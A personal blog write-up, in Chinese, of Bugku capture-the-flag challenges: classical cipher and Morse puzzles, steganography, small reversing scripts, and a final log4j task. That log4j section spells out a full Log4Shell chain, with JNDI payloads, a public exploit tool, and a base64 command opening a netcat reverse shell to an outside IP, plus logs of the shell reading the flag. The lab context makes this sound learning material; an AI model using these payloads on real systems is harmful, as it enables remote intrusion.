bugku随便玩玩

date
Dec 27, 2022 02:41 AM
Related to 日程数据 1 (blog)
tags
Writeup
Website
slug
bug
summary
2

抄错的字符

老师让小明抄写一段话,结果粗心的小明把部分数字抄成了字母,还因为强迫症把所有字母都换成大写。你能帮小明恢复并解开答案吗:QWIHBLGZZXJSXZNVBZW
 
而数字和字母相似的有 I(i)=>1、L(l)=>1、G(g)=>9、Z(z)=>2、S(s)=>5
 
 
 

/。-

..-./.-../.-/--./----.--/-../...--/..-./-.-./-.../..-./.----/--.../..-./----./...--/----./----./...../-----/....-/-----.-
不是培根
莫斯又多了
..-. .-.. .- --. ----.-- -.. ...-- ..-. -.-. -... ..-. .---- --... ..-. ----. ...-- ----. ----. ..... ----- ....- -----.-
notion image

聪明的小羊

一只小羊翻过了2个栅栏 fa{fe13f590lg6d46d0d0}
notion image
 

ok

 
notion image
就三种貌似
毫无意义的题 零实战
notion image
 

把猪困在猪圈里

notion image
/9j/ 不是图片吗
notion image
实锤,保存文件
这又是啥
notion image
没了
 
 

telnet

 
入门版de
notion image
 
 

眼见非实

notion image
这都是啥
docx 本质就是压缩包
notion image
 
 

ping

notion image
全是icmp
难道是找通的
想太多
notion image
notion image
sogo
notion image
怎么选出来各显神通吧
 
 

Linux2

没啥 分离一下
 
notion image
这是个幌子
这么大的文件就一张图??
 
strings brave |more
notion image
strings命令在对象文件或二进制文件中查找可打印的字符串。字符串是4个或更多可打印字符的任意序列,以换行符或空字符结束。 strings命令对识别随机对象文件很有用。
 
 

入门逆向

 
notion image
notion image
列模式 正则
notion image

Easy_Re Reverse

 
根据题目关键字查找
notion image
 
 

游戏过关 Reverse

 
notion image
notion image
换一个
notion image
notion image
# py -3
# coding:utf-8

array1 = [18,64,98,5,2,4,6,3,6,48,49,65,32,12,48,65,31,78,62,32,49,32,1,57,96,3,21,9,4,62,3,5,4,1,2,3,44,65,78,32,16,97,54,16,44,52,32,64,89,45,32,65,15,34,18,16,0]
array2 = [123,32,18,98,119,108,65,41,124,80,125,38,124,111,74,49,83,108,94,108,84,6,96,83,44,121,104,110,32,95,117,101,99,123,127,119,96,48,107,71,92,29,81,107,90,85,64,12,43,76,86,13,114,1,117,126,0]

flag = ''
for i in range(len(array1)):
    flag+= chr(array1[i] ^ array2[i] ^ 0x13 )
print (flag)
 

Easy_vb Reverse

 
MCTF{N3t_Rev_1s_E4ay}
notion image
 
 

love

 
notion image
notion image
notion image
简单注释
notion image
import base64
s ="e3nifIH9b_C@n@dH" 
flag =""
for i in range(len(s)):
    flag += chr(ord(s[i])- i)
flag = base64.b64decode(flag)
print(flag)
解密
 
 

马老师杀毒卫士

 
notion image
notion image
def enFence(string, space):
   s = ""
   for i in range(0, space):
       for j in range(i, len(string), space):
           # 不能越界
           if j < len(string):
               s += string[j]
   print(s)


def deFence(string, space):
   s = ""
   if len(string) % space == 0:
       key = len(string) // space
   else:
       key = len(string) // space + 1
   # 小于间隔继续
   for i in range(0, key):
       for j in range(i, len(string), key):
           # 不能越界
           if j < len(string):
               s += string[j]
   print(s)
deFence("fgaag_!l{_oun}amb_ob",3)
 

NoString

 
 
notion image
 
s="oehnl3r=<?=hF@CCGPt"
f="yelhzl)`gy|})|)oehnl3"
flag=""
for i in s:
    flag= flag +chr(ord(i) ^ 9)
    print(chr(ord(i) ^ 9))
print(flag)
 

这是一张单纯的图片

 
notion image
notion image
有奇怪的代码
复制走
notion image

隐写

 
 
notion image
exiftool 2.png   
ExifTool Version Number         : 12.30
File Name                       : 2.png
Directory                       : .
File Size                       : 17 KiB
File Modification Date/Time     : 2017:06:07 22:26:44+08:00
File Access Date/Time           : 2021:12:12 18:02:12+08:00
File Inode Change Date/Time     : 2021:12:12 18:02:11+08:00
File Permissions                : -rw-r--r--
File Type                       : PNG
File Type Extension             : png
MIME Type                       : image/png
Image Width                     : 500
Image Height                    : 420
Bit Depth                       : 8
Color Type                      : RGB with Alpha
Compression                     : Deflate/Inflate
Filter                          : Adaptive
Interlace                       : Noninterlaced
Pixels Per Unit X               : 4724
Pixels Per Unit Y               : 4724
Pixel Units                     : meters
Profile Name                    : Photoshop ICC profile
Profile CMM Type                : Linotronic
Profile Version                 : 2.1.0
Profile Class                   : Display Device Profile
Color Space Data                : RGB
Profile Connection Space        : XYZ
Profile Date Time               : 1998:02:09 06:49:00
Profile File Signature          : acsp
Primary Platform                : Microsoft Corporation
CMM Flags                       : Not Embedded, Independent
Device Manufacturer             : Hewlett-Packard
Device Model                    : sRGB
Device Attributes               : Reflective, Glossy, Positive, Color
Rendering Intent                : Perceptual
Connection Space Illuminant     : 0.9642 1 0.82491
Profile Creator                 : Hewlett-Packard
Profile ID                      : 0
Profile Copyright               : Copyright (c) 1998 Hewlett-Packard Company
Profile Description             : sRGB IEC61966-2.1
Media White Point               : 0.95045 1 1.08905
Media Black Point               : 0 0 0
Red Matrix Column               : 0.43607 0.22249 0.01392
Green Matrix Column             : 0.38515 0.71687 0.09708
Blue Matrix Column              : 0.14307 0.06061 0.7141
Device Mfg Desc                 : IEC http://www.iec.ch
Device Model Desc               : IEC 61966-2.1 Default RGB colour space - sRGB
Viewing Cond Desc               : Reference Viewing Condition in IEC61966-2.1
Viewing Cond Illuminant         : 19.6445 20.3718 16.8089
Viewing Cond Surround           : 3.92889 4.07439 3.36179
Viewing Cond Illuminant Type    : D50
Luminance                       : 76.03647 80 87.12462
Measurement Observer            : CIE 1931
Measurement Backing             : 0 0 0
Measurement Geometry            : Unknown
Measurement Flare               : 0.999%
Measurement Illuminant          : D65
Technology                      : Cathode Ray Tube Display
Red Tone Reproduction Curve     : (Binary data 2060 bytes, use -b option to extract)
Green Tone Reproduction Curve   : (Binary data 2060 bytes, use -b option to extract)
Blue Tone Reproduction Curve    : (Binary data 2060 bytes, use -b option to extract)
White Point X                   : 0.31269
White Point Y                   : 0.32899
Red X                           : 0.63999
Red Y                           : 0.33001
Green X                         : 0.3
Green Y                         : 0.6
Blue X                          : 0.15
Blue Y                          : 0.05999
Image Size                      : 500x420
Megapixels                      : 0.210
Image Width : 500 Image Height : 420 Pixels Per Unit X : 4724 Pixels Per Unit Y : 4724
 
信息不对等
修改一下保存
notion image
 
notion image
 

赛博朋克

 
notion image
 
java环境有点问题
Stegsolve 显示不全
pass

贝斯手

 
notion image
notion image
5+58==327a6c4304ad5938eaf0efb6cc3e53dcCFmZknmK3SDEcMEue1wrsJdqqkt7dXLuS
 
 
notion image
notion image
 

做题要细心-1

 
notion image
 
 

log4j

 
 
${jndi:ldap://cztlh5.dnslog.cn/exp}
notion image
 
notion image
存在漏洞
 
git clone https://github.com/black9/Log4shell_JNDIExploit.git
unzip log4j.zip

#进入目录
cd log4j/
java -jar *.jar -i 114.114.114.114 -p 8080
#开启nc监听12345端口
nc -lvn 12345
${jndi:ldap://x.x.x.x:1389/Basic/Command/Base64/[base64加密后命令]}
notion image
还要安装环境
apt install default-jre

${jndi:ldap://102.223.75.148:1389/Basic/Command/Base64/bmMgMTAyLjIyMy43NS4xNDggMTIzNDUgLWUgL2Jpbi9zaA==}
 
 
notion image
➜  Log4shell_JNDIExploit git:(main) ✗ java -jar *.jar -i 102.223.75.148 -p 8080
[+] LDAP Server Start Listening on 1389...
[+] HTTP Server Start Listening on 8080...
[+] Received LDAP Query: Basic/Command/Base64/bmMgMTAyLjIyMy43NS4xNDggMTIzNDUgLWUgL2Jpbi9zaA==
[+] Paylaod: command
[+] Command: nc 102.223.75.148 12345 -e /bin/sh
[+] Sending LDAP ResourceRef result for Basic/Command/Base64/bmMgMTAyLjIyMy43NS4xNDggMTIzNDUgLWUgL2Jpbi9zaA== with basic remote reference payload
[+] Send LDAP reference result for Basic/Command/Base64/bmMgMTAyLjIyMy43NS4xNDggMTIzNDUgLWUgL2Jpbi9zaA== redirecting to http://102.223.75.148:8080/ExploitWyWFTkcVxR.class
[+] New HTTP Request From /114.67.175.224:46900  /ExploitWyWFTkcVxR.class
[+] Receive ClassRequest: ExploitWyWFTkcVxR.class
[+] Response Code: 200
[+] Received LDAP Query: Basic/Command/Base64/bmMgMTAyLjIyMy43NS4xNDggMTIzNDUgLWUgL2Jpbi9zaA==
~ nc -lvnp 12345
listening on [any] 12345 ...
connect to [102.223.75.148] from (UNKNOWN) [114.67.175.224] 42381



ls
bin
dev
etc
flag
home
lib
linuxrc
media
mnt
proc
root
run
sbin
srv
start.sh
sys
tmp
usr
var
cat flag
flag{60f59ffe0f15aad3d9e544fbef142349}
 
 

© lewoking 2021 - 2022